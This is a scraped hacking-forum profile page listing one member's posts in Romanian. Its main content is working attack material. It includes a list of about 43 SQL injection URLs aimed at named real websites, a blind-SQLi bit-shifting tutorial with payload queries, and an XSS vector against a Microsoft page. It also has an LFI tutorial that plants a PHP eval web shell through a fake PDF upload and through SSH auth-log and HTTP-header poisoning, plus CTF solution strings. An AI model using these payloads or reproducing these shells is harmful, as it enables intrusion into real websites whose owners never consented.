Jump to content

dancezar

Active Members
 View Profile  See their activity

  • Posts

    981

  • Joined

  • Last visited

  • Days Won

    20

 Content Type 

Everything posted by dancezar

  1. dancezar
    Fa ambele:)
  2. dancezar
    Asta daca stii de dinainte packetul POST trimis,dar asa iti trebuie livehttp sa capturezi packetul si dupa poti sa il bagi in hackbar.
  3. dancezar
    In contextul asta ,nu poti "penetra" un sqli:))) sau depinde la ce te-ai referit
  4. dancezar
    Penetrat...) http://www.minutemanhq.com/hq/print.php?sid=163%20and%200%20/*!12345union*/%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13+--+ http://www.cartesia.org/print.php?sid=206%20and%200%20union%20select%201,2,@@version,4,5,6+--+ http://www.genderwork.ca/cms/displaysection.php?sid=42%20union%a0select%a01,@@version,3+--+ http://www.jceps.com/print.php?articleID=25%27%20and%200%20/*!12345union*/%20select%201,2,3,4,5,@@version,7,8,9,10,11,12,13,14,15,16,17,18+--+ http://www.hkyongnuo.com/e-detail.php?ID=288%20div%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+ http://www.firstgulf.com/search-details.php?id=59%20and%200%20UNION%20SELECT%201,2,concat%28%27%3C/a%3E%3Cscript%3Ealert%28%22%27,@@version,%27%22%29;%3C/script%3E%27%29,4,5,6,7,8,9,10,11+--+ http://www.vrijglas.org/detail.php?id=21%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12+--+ http://www.irs-net.de/aktuelles/veranstaltungen/detail.php?id=176%20and%200%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18,19,20,21+--+ http://www.itmf.org/wb/pages/home/publications/detail.php?lang=DE&id=5%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12+--+ http://www.albertabairtheater.org/event-detail.php?id=325->nu e vulnerabil http://www.appealofconscience.org/detail.php?id=582%27%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+&cat=news http://www.hftexports.com/products-detail.php?id=6%20and%200%20union%20select%201,@@version,3,4,5+--+ http://learning.pmi.org/course-detail.php?id=274%20div%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ http://bbbiotechconference.com/conference-details.php?id=10%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ http://www.bluegrassmidwest.com/details.php?id=-10%27/**/union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/@@version)b/**/join/**/(select/**/3)c/**/join/**/(select/**/3)d/**/join/**/(select/**/4)e/**/join/**/(select/**/4)f/**/join/**/(select/**/4)g/**/join/**/(select/**/4)h/**/join/**/(select/**/4)j/**/join/**/(select/**/4)k/**/join/**/(select/**/4)l%23 -->Interesant asta http://www.rifm.org/publications-details.php?id=22%20and%200%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13+--+ http://www.tenement.org/tenement-talks-details.php?id=790%27%20and%200%20UNION%20SELECT%201,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+ http://www.starbrightbooks.org/details.php?id=346 and 0 union select 1,2,3,4,5,6,7,8,9,10,11+--+ http://www.enidblytonsociety.co.uk/book-details.php?id=182%20and%200%20/*!12345UNION*/%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%60 http://www.delinez.com/details.php?id=138-->probabil nu e vul http://impactlive.ca/events-details.php?ID=127%27%20and%200%20UNION%20SELECT%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ http://www.adg-europe.com/pro-details.php?id=33%27%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9+--+ http://www.bvfonts.com/fonts/details.php?id=45%27%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%60 http://www.capequarter.co.za/details.php?id=2%27%20and%200%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+ http://www.southbayballet.org/photo-gallery.php?id=35%20and%20%28select%20count%28*%29%20from%20/*!12345information_schema*/.tables%20group%20by%20concat_ws%280x00,version%28%29,floor%28rand%280%29*2%29%29%29+--+ http://ditto3d.com/gallery.php?id=7%20and%200%20union%20select%201,2,@@version+--+ -->cauta in sursa 5. http://www.nickhawkexplicit.com/gallery.php?id=77%20and%200%20UNION%20SELECT%20concat%280x3a,@@version%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+ -->Interesant http://manuelmorgado.com/illustration/gallery.php?id=41%20and%200%20/*!12345UNION*/%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14+--+ http://www.suagacollection.com/photo-gallery.php?id=1%20or%20%28select%20count%28*%29%20from%20information_schema.tables%20group%20by%20concat%28@@version,floor%28rand%280%29*2%29%29%29+--+ http://www.melbournefineart.com.au/gallery.php?id=18%20and%200%20UNION%20SELECT%201,@@version,3,4,5+--+ -->OOOOLD http://www.hebron.com/english/gallery.php?id=170%20or%201%20group%20by%20concat%28@@version,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201+--+ ->>si mai oooold merge c union select null,null,null..... dar nu am chef http://www.simplytobago.com/gallery.php?id=47%20and%200%20UNION%20SELECT%201,2,@@version,4,5,@@version,7+--+ http://www.emmaturle.com/gallery.php?id=55%20and%200%20union%20select%201,2,@@version+--+ -->cauta in sursa 5. http://www.jetskiworld.gr/gallery.php?id=665%20or%201%20group%20by%20concat%28@@version,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201+--+ http://www.nubri.org/gallery.php?id=1%20and%200%20union%20select%20@@version+--+ http://www.givot.co.il/english/gallery.php?id=45 ->> ip blocat error based http://www.shaggyfoundation.org/gallery.php?id=3%20or%201%20group%20by%20concat%28@@version,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201+--+ http://www.hanhdance.com/gallery.php?id=47%20and%200%20union%20select%201,2,3,@@version,5,6,7,8+--+ http://cti-pfan.net/gallery.php?id=7%20and%200%20union%20select%201,@@version,3,4,5,6,7,8+--+ http://www.ajex.org.uk/gallery.php?ID=1%20and%200%20/*!12345union*/%20select%201,2,version%28%29,4+--+ http://rivardcompetition.com/en/Gallery.php?id=5%20and%200%20union%20select%201,2,@@version,4+--+ http://www.nightgallery.ca/event.php?id=78%20and%200%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ -->nice font http://www.ausglass.org.au/gallery-images.php?id=162%20and%200%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+ Am rezolvat 43 P.O.C te astept cu restul
  5. dancezar
    Miercuri vroia sa spuna
  6. dancezar
    Challenge.close() Rezolvarea se afla aici. La sqli nu s-au gandit decat 3-4 persoane. Pentru cei care vor sa il incerce aici aveti arhiva cu scriptul: https://www.mediafire.com/?aqizkdm2tm1yddy Setati datele de conectare la DB in index.php,admin.php si /image/index.php apoi executati fiserul sql in phpmyadmin Sintaxa folosita: ",(select count("ceva") from(select 1 union select 2 union select 3)x group by concat((select @@version),floor(rand(0)^2)))# Cu %a0 in loc de spatii
  7. dancezar
    Baaa vezi ca iti sterg numele:)))) Bravo. Challenge deschis pana duminica la ora 11:00 cand il voi inchide si voi posta rezolvarea.
  8. dancezar
    Mno s-a reparat http://www.microsoft.com/oem/pages/preferences.aspx?ReturnUrl=http://www.google.ro%27%29;alert%28document.domain%2b%27::danyweb09 Am uitat sa fac o poza necenzurata greseala mea, dar se observa clar din poza cenzurata ca este acelasi locatie.Js-ul sarea atunci cand dadem click pe Go .Inainte codul sursa aparea asa <input type="button" value="Go" onclick="go('http://www.google.com');"> si cu vectorul : ');alert('1 Aparea: <input type="button" value="Go" onclick="go('http://www.google.com[COLOR="#FF0000"]');alert('1');[/COLOR]"> Acuma au mutat acel redirect in action="....."
  9. dancezar
    Hint 1: O imagine face cat 100 de cuvinte. Hint 2: Folosesc baza de date. Daca v-ati prins , be quiet.
  10. dancezar
    TargeT : http://danyweb-challenge.host56.com/ Misiunea este simpla gasiti o vurnerabilitate nu conteaza ce,exploatati-o si scrieti-va numele pe index. Am introdus doua inregistrari pe index ca sa fac niste teste. Reguli: -Nu divulgati numele vurnerabilitati pe care ati gasit-o sau cuvinte care ar avea legatura cu aceasta -Trimiteti-mi pe pm rezolvarea -Postati un post cu poza numelui tau de pe index (doar index-ul nu altceva), in thread-ul acesta ca sa dovedesti ca numele de pe index este al tau. -Nu dati alte hinturi Solveri: -askwrite
  11. dancezar
    Un site care nu e vulnerabil,tu nu stiai exact daca este vulnerabil si ne-ai pus pe noi. Te-ai gandit mult la replica asta din moment ce post-ul meu a fost facut acum cateva saptamani. E bine ca stii sa scrii vulnerabilitate ,mai ramane sa aflii ce inseamna.
  12. dancezar
    Bag pl cand sa incerc sa il fac si eu, iara stricat indexu
  13. dancezar

    Fun stuff

    dancezar replied to Wisa's topic in Discutii non-IT

    http://s30.postimg.org/o49ig2c1t/123.png Plm cautam un XSS in yahoo,am bagat pattentul cu care is obisnuit si surpriza:))
  14. dancezar
  15. dancezar
    Nu cred ca mai are rost din moment ce a postat worm rezolvarea'"<> http://florin-darck.3owl.com/challenge/hackyard.php?x=ttp://comyuycs.comli.com/a.Js?a=
  16. dancezar
    Metoda este "descoperita" de Jelmer de Hen si presupune extragerea datelor prin blind based intr-o maniera mult mai optimizata. Metoda prin bit shifting este optimizata pentru a extrage o litera ditr-un sir cu doar 8 requesturi,pentru un dictionar de 45 de caractere. Query-ul este acesta : [COLOR="#FF0000"]and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+[/COLOR] Cum functineaza aceasta metoda? Functia find_in_set primeste 2 parametri primul o litera sau un sir x de caractere iar al doilea un sir de caractere despartite prin virgula si v-a returna pozitia pe care se afla x in sirul de caractere despartite prin virgule. Exemplu: Pentru urmatorul query:select find_in_set('a',',b,c,a,z,') v-a returna 3 pentru ca litera a se afla pe pozitia 3 in sirul de caractere despartite prin virgula. Segventa mid(@@version,1,1) v-a returna prima litera din @@version care poate fi 5 si daca vom schimba mid(@@version,2,1) ne v-a returna "." unind aceste doua caractere vom obtine 5. si asa mai departe. Asta inseamna ca daca functia find_in_set ne furnizeaza pozitia exacta in sirul dictionar noi vom stii ce litera este. Exemplu:select find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,') V-a returna 34 deci in real case ca sa ghicim prima litera din @@version vom proceda in felul urmator: set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>0 -->rezultat pozitiv set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>10 -->rezultat pozitiv set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>20 -->rezultat pozitiv set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>30 -->rezultat pozitiv set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')>40 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=40 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=39 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=38 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=37 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=36 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=35 -->rezultat negativ set.com/index.php?id=1 and find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')=34 -->rezultat pozitiv-->aici ne oprim Deci am aflat pozitia primei litere adica 34 iar in dictionar a 34 litera este 5 deci este corect.Dar am obtinut rezultatul in 11 requesturi dar putem foarte bine sa il inbunatatim. Ultimul caracter din dictionarul nostru este $ si se alfa pe pozitia 41 daca vom converti acest numar in binar vom obtine 101001.Numarul are in total 6 cifre care ori este 1 ori este 0.Daca vom lua sa ghicim fiecare cifra din rezultatul nostru binar vom fi surprinsi ca in loc de 14 requesturi ca in metoda de mai sus vom obtine decat 6... De ce ? site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)=1 --> obtinem un rezultat pozitiv inseamna ca primul bit este [COLOR="#FF0000"]1[/COLOR] site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),2,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]10[/COLOR] site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),3,1)=1 --> obtinem un rezultat pozitiv inseamna ca urmatorul bit este 1 [COLOR="#FF0000"]101[/COLOR] site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),4,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]1010[/COLOR] site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),5,1)=1 --> obtinem un rezultat negativ inseamna ca urmatorul bit este 0 [COLOR="#FF0000"]10100[/COLOR] site.com/index.php?id=1 and mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),6,1)=1 --> obtinem un rezultat pozitiv inseamna ca urmatorul bit este 01[COLOR="#FF0000"]101001[/COLOR] Rezultatul v-a fi 101001 care in reprezentatie zecimala inseamna 34 acelasi rezultat ca mai sus dar numai in 6 requesturi. Dar cum vom stii ca am ajuns la ultimul bit fara ca sa mai facem requesturi in plus? Ne folosim de functia sleep(10) in momentul cand vom primi un rezultat null din seria de biti inseamna ca serverul v-a astepta 10 secunde si vom stii ca am ajuns la ultimul bit fara vreun request in plus. [COLOR="#FF0000"]and if((select @c:=(mid(bin(find_in_set(mid(@@version,1,1),'q,w,e,r,t,y,u,i,o,p,a,s,d,f,g,h,j,k,l,z,x,c,v,b,n,m,.,;,_,1,2,3,4,5,6,7,8,9,0,@,$,')),1,1)))='',sleep(10),@c)+--+[/COLOR] Diferenta la prima vedere nu este foarte mare dar am implementat acest algoritm pe programul meu de Mysql blind based de la RST POWER si am comparat rezultatele pe localhost.Algoritmul simplu cu ASCII a facut in total pentru un sir de 40 de caractere(un hash) ~450 de requesturi iar algoritmul cu bit shifting numai 260 deci.. aproape la jumatate.Am sa postez ultima versiune diseara impreuna cu algoritmul acesta implementat ,mai am putin de lucru pentru ca la mai multe requesturi consecutive primesc rezultate cu 1-2 litere scoase aiurea. Sursa:http://www.exploit-db.com/papers/17073/
  17. dancezar
    mai vreau challenge-uri de genu ms mult:)
  18. dancezar
    Bravo baieti maine am sa inchid challenge-ul si am sa postez si secretul:)) Poate mai rezolva cineva pana maine Edit: Challenge Closed Felicitari tuturor participantilor -Bitmap -askwrite -Bit-ul -wHoIS Solutia a fost foarte simpla si se afla in HINT si anume source code. Daca puneati dupa id=1 order by 1+--+ si va uitati in sursa veti obtine o eroarea ca asta "ion for the right syntax to use near 'yb redro 1' at line 1-" . "yb redro 1" este inversat cea ce inseamna ca orice introduceti dupa id v-a fi rasturnat daca bagati dupa id "mere" in sursa v-a aparea eroarea si va v-a spune "erem".Cum facem sa inversam acest proces? foarte simplu daca noi vom introduce deja un cuvant invers citit de la dreapta la stanga functia strrev din php v-a inversa acest cuvant si il v-a aduce la forma lui normala. Cu astea fiind spune pentru a numera coloanele folosim:http://comyuycs.comli.com/sqli2.php?id=1%20yb%20redro%201 dupa ce functia v-a inversa cuvantul vom obtine order by 1 iar daca schimbam id=4 yb redro 1 vom obtine eroarea Unknown column '4' deci is 3 coloane. Apoi facem union pe 3 coloane in felul umator http://comyuycs.comli.com/sqli2.php?id=3,2,1%20tceles%20noinu%200 si vom obtine coloana vurnerabila 2.Si vom folosi acelasi procedeu pentru a scoate versiunea http://comyuycs.comli.com/sqli2.php?id=3,noisrev@@,1%20tceles%20noinu%200
  19. dancezar
    Multumesc am sa modific.Imaginile exista nu stiu de ce da 404:-/
  20. dancezar
    In acest tutorial am sa va prezint doua metode de a exploata LFI. Acestea sunt: 1) LFI combinat cu arbitrary file upload 2) LFI cu /var/log/auth.log Dupa ce am dat un search pe google aproximativ 2 ore am gasit 2 LFI-uri care au corespuns criteriilor mele .Pozele sunt cenzurate dar poate am mai scapat ceva indicii;) 1) LFI + arbitrary file upload Aceasta metetoda are la baza un concept simplu.Pe site sa zicem ca exista un LFI si noi nu avem acces la loguri iar allow_http este off ,dar totusi putem include fisiere de pe site.Aa zicem ca pe acelasi site se afla un script de upload poze care nu permite uploadarea fisierelor php ci doar a celor cu extensie .gif sau .jpg .Ce putem face? Pai uploadam un fisier cu extensie permisa dar continutul sa fie un shell:D.Tin sa mentionez ca aceasta metoda nu functioneaza daca doar se pot citi fisiere (Source code Discloure) ci doar cele care au in spate functia include( sau functia require( require_once( etc.. Am pregatit in continuare un exemplu : Avem urmatorul LFI: http://s28.postimg.org/n7070anek/image.jpg Am reusit cu succes sa includem fisierul /etc/passwd. Dupa ce am cercetat putin site-ul am gasit un formular unde administratorul poat uploada fisiere PDF dar nu pot fi urcate fisiere cu alta extesie. Dar se pare ca nu putem uploada fisiere daca nu introducem o parola prestabilita:P.Ce am facut? Pai m-am folosit de metoda php://filter pentru a citi sursa pagini uploadform.php. php://filter/convert.base64-encode/resource=fisier.php Dupa cum stiti aceasta metoda presupune preluarea continutului fisier.php encodarea lui in base64 si afisarea lui in pagina.Daca cautati prin posturile mele gasiti si un tutorial pe aceasta tema. Dupa ce am executat injectia am obtinut continutul in base64 http://s28.postimg.org/n7070anek/image.jpg Iar dupa acea l-am decodat. Dar se pare ca parola pe care o vrem sa o obtinem nu se afla in acest fisier ci in upload.php:)) Ok am executat aceasi injectie pentru a citi continutul fisierului upload.php . Si bingo am obtinut parola care este encodata in md5.Dupa ca am dat un search pe google am aflat ca aceast hash ascunde in spate parola upload1 . Am creat un fisier pdf.pdf in care am pus un cod php. <?php eval($_GET['a']); ?> Acest cod ne v-a crea un Remote Code Execution cu care putem face practic orice. Iar apoi l-am uploadat cu parola respectiva. Dupa care am aflat unde s-a urcat pdf-ul http://s2.postimg.org/cpn3ty8a0/image.jpg Acuma nu imi mai ramane nimic de facut decat sa includ acel fisier si sa vad rezultatul. Rezultatul a fost dezamagitor pentru ca administratorul a dezactivat functia phpinfo(); Dar totusi Remote Code Execution am reusit sa il injectez:D. De ce s-a executat codul php? Pentru ca include si pentru ca php. Pai in documentatia PHP la functia include nu se zice nicaieri ca este impusa o extesie anume pe care avem voie sa o includem poate fi si .php poate fi .pdf si poate fi .jpg de ce nu ,atata timp cat acolo se afla un cod php functia il v-a executa. 2) LFI cu /var/log/auth.log Aceasta metoda se foloseste de log poisoning.Pentru cei care nu stiu var log auth.log este un fisier cu loguri.Dar in acest fisier cu loguri nu se mai pastreaza loguri despre traficul HTTP,ci traficul si tentativele de logare de pe protocolul SSH.Mai exact daca noi ne vom conecta prin putty la un site anume si ne vom loga cu un username si parola gresita,in /var/log/auth.log v-a aparea ca userul cutare cu ip-ul cutare a incercat sa se logheze pe ssh. Am pregatit si un mic exemplu: Avem urmatorul LFI: http://s28.postimg.org/dmm2twlbw/image.jpg Ok acuma vom verifica existenta ecestui fisier /var/log/auth.log Principiul este simplu daca noi am putut include fisierul var/log/auth.log inseamna ca daca ne am loga pe ssh si am incerca un user gen <?php echo 1; ?> in acel fisier se v-a inregistra tentativa noastra de logare si daca vom inrca sa includem din nou fisierul /var/log/auth.log acel cod php v-a fi executat. Dupa ce m-am asigurat ca portul ssh este deschis am deschis putty si m-am logat cu username-ul :<?php eval($_GET['a']); ?> dupa cum se observa mai jos: http://s30.postimg.org/8faonucy9/image.png Deci m-am logat cu utilizatorul de mai sus si evident ca tentativa de logare a fost inregistrata in fisierul /var/log/auth.log.Acuma daca incerc sa includ din nou fisierul /var/log/auth.log cu parametrul GET a=phpinfo(); ce voi obtine v-a fi asta: http://s23.postimg.org/p8gkd5gvu/image.jpg Acuma la urma am sa va mai arat un demo tot cu log poisoning dar de data asta cu proc/self/environ.Stiu ca mai exista n tutoriale despre proc/self/environ dar acesta este altceva pentru ca nu vom putea injecta codul php in user agent. Deci am pregatit un alt exemplu si avem urmatorul LFI: http://s3.postimg.org/evzgmtpv7/image.png Ok verificam daca exista /proc/self/environ: http://s29.postimg.org/5p285v1mu/image.jpg Totul e bine continutul lui proc/self/environ este afisat dar uitati ce se intampla cand vom incerca sa injectam codul malitios in user agent: http://s7.postimg.org/7pcbc0im3/image.png Nu vom putea face url encode pentru a trece de filtru pus pe <> pentru ca daca vom introduce %3c spre exemplu acesta v-a fi introdus in proc self inviron exact asa cum este %3c si nu se v-a mai executa codul php.Ce putem face:-/? Administratorul site-ului a pus filtru pe useragent dar el nu stie ca orice header trimis ca cerere catre server este inregistrat in proc/self/environ;) Deci voi incerca sa injectez codul in headerul Accept: ... http://s13.postimg.org/5z2yfdqae/image.jpg Si rezultatul v-a fi acesta.Nu conteaza in ce header injectati codul php poate fi Accept-Encoding: sau Accept-Language: acesta v-a fi inregistrat in fisierul /proc/self/environ. Cam atat am avut de prezentat sper sa va fi fost de folos si sa fi placut daca da apasati butonul de like:D Am sa mai rectific sa corectez eventuale greseli gramaticale.
  21. dancezar
    Daca este sa nu fie dublicate se incadreaza la 5000 pentru ca e in play
  22. dancezar
    Daca este subdomeniu .google.com te incadrezi la Normal Aplications adica la 3000$
  23. dancezar
    De ce doar 200$? ca doar e .google.com
  24. dancezar
    Imi amintesc cand aveam 7-8 ani imi placea mult sa ma joc cu fire motorase baterii si alte prostii.Aveam un joc de ala cu casete daca isi mai aminteste cineva jucam toata ziua pe el intr-o zi acel trasformator chinezesc s-a topit pentru ca l-am lasat in priza destul timp apoi de copil drac ce eram am "taiat" in jumate transformatorul si am vrut sa vad ce are de nu mai merge.L-am bagat din nou in priza si am atins din greseala unul din firele care facea legatura atunci m-am curentat intr-un hal de am ramas cam 2-3 secunde cu degetu pe acea bara din metal mi-a tras mana taicamio (care era prin apropiere din intamplare )de pe transformator ,nu am patit mai nimic dar dupa un minut am realizat ca m-am curentat in momentul dupa ce mi-a tras mana taicamio tremuram si nu stiam ce era cu mine.De atunci nu am mai pus mana pe priza fara sa verific de 3 ori. Apoi la un an am primit primul pc era un AMD 2400+ si avea 256 mb ram intr-un an am invatat sa fac mai orice pe PC invatasem sa imi reinstalez singur WIndows-ul dupa ce vazusem la un baiat cu un service de PC-uri.Apoi pana la 12 ani jucam jocuri Gta vice city si tot felu de jocuri dupa ce invatasem sa dau jos de pe torrent.Apoi am avut o experienta cu pirotehnicile eram curios despre cum sa fac bombe si petarde.Faceam petarde din alea cu surub daca mai stie cineva dupa ce am vazut la niste tigani de pe strada invatasem sa obtin hidrogen din soda caustica si folie de aluminiu cu apa lasam 1 ora deabea se umplea balonu si ii dadeam foc si buff:)).Pana descoperisem carbitu Ala era crima curata ,eram cel mai detemut copchil de pe strada cand bubuiam cu tunu se auzea toata zona pentru ca eu stau la bloc.Intr-o zi nu am fost atent si am dat cu tunu cand o fata era langa mine si i-am parlit blana de la geaca=)) nu a patit nimic dar am primit o morala de la tacsu care era politistde atunci m-am lasat si de asta pe la 13-14 am inceput sa fiu interesat de programare si de atunci mi-am preocupat timpul cu asta
  25. dancezar
    Scuze da sintaxa aia nu e facuta de tine este folosita de tine Uite si sintaxa folosita de mine http://www.mangaldeep.co.in/news1.php?id=3 and @a:=1 LIKE(select @a from(select count(@a),concat((select concat(0x3a,@@version,':danyweb09::')),floor(rand(0)*1337))sele from information_schema.tables group by sele)plm)
×
×
  • Create New...